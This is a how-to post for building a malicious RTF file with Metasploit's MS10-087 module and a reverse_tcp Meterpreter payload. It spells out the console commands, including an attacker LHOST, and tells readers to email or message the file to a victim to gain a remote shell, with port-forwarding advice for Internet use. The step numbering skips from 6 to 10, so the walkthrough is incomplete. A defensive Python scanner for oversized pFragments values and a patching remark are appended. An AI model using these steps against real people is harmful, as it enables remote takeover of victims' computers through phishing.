1. Turn on your Kali Linux machine
2. Open the terminal, type msfconsole and press Enter. Wait for Metasploit to load (it could take a while).
3. Once Metasploit has loaded completely, type in the command below:
use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
4. Now set the Meterpreter payload by typing in the following command:
set payload windows/meterpreter/reverse_tcp
5. This step is optional but recommended because it shows you the options you can use for this exploit. It will also show you the file name you set, LHOST, LPORT, etc. You can view the options by typing show options and pressing Enter.
6. Now name the .rtf file to be generated by typing the command set FILENAME filename.rtf and pressing Enter, where filename.rtf is the name of the file.
Type set LHOST 192.168.30.132 and press Enter.
10. Now you are ready to exploit. Simply type in exploit and press Enter.
Just type in cd /root/.msf4/local and press Enter to move to the directory containing the exploit, then execute the following command:
cp /root/.msf4/local/filename.rtf /root/Desktop
In my case, it is cp /root/.msf4/local/greeting.rtf /root/Desktop
You should now see a copy of the exploit on your Kali Desktop. Upload this file to a file hosting service, generate a link and send it to the victim via chat or email. Once the victim downloads the file and opens it, BOOM, you own their computer. From here you can navigate their computer using the Metasploit console. Just type in shell and press Enter to drop into a shell.
Note that what I just showed you only works on a LAN and not over a WAN or the Internet. For this to work over the Internet, you will need to go into your router and configure port forwarding.
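For defenders, an added example (not part of the original post and not Metasploit code): a Python triage scanner that flags RTF files carrying the pFragments shape property this module abuses and reports how long its value is. The 64-character threshold, the function names and both sample documents are assumptions constructed for illustration.

```python
import re

# Assumption: triage threshold picked for this example; tune it on your own corpus.
MAX_SV_CHARS = 64

SN_GROUP = re.compile(rb"\{\s*\\sn\s+([^{}]*)\}")   # {\sn <property name>}
SV_OPEN = re.compile(rb"\s*\{\s*\\sv\b")            # {\sv ... right after the name


def group_end(data: bytes, start: int) -> int:
    """Index just past the '}' closing the first group opened at or after start."""
    depth, i = 0, start
    while i < len(data):
        ch = data[i:i + 1]
        if ch == b"\\":          # skip escaped \{ \} \\ so they don't change depth
            i += 2
            continue
        if ch == b"{":
            depth += 1
        elif ch == b"}":
            depth -= 1
            if depth == 0:
                return i + 1
        i += 1
    return len(data) + 1         # unterminated group: value runs to end of file


def scan_rtf(data: bytes) -> list:
    """Return one finding per pFragments shape property found in raw RTF bytes."""
    findings = []
    for m in SN_GROUP.finditer(data):
        # RTF readers ignore CR/LF, so a name split across lines still counts.
        name = re.sub(rb"[\r\n]", b"", m.group(1)).strip()
        if name.lower() != b"pfragments":
            continue
        sv = SV_OPEN.match(data, m.end())
        value = b""
        if sv:
            value = data[sv.end():group_end(data, sv.start()) - 1].strip()
        findings.append({"offset": m.start(), "value_chars": len(value),
                         "oversized": len(value) > MAX_SV_CHARS})
    return findings


# Constructed samples (not real malware): filler bytes only, no payload.
BENIGN = rb"{\rtf1{\shp{\*\shpinst{\sp{\sn shapeType}{\sv 1}}}}}"
SUSPECT = (b"{\\rtf1{\\shp{\\*\\shpinst{\\sp{\\sn pFrag\r\nments}"
           b"{\\sv 1;1;" + b"41" * 200 + b"}}}}}")

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, scan_rtf(doc))
```

Installing the MS10-087 update on the Office host removes the vulnerability itself; the scanner is only for triaging attachments and downloads.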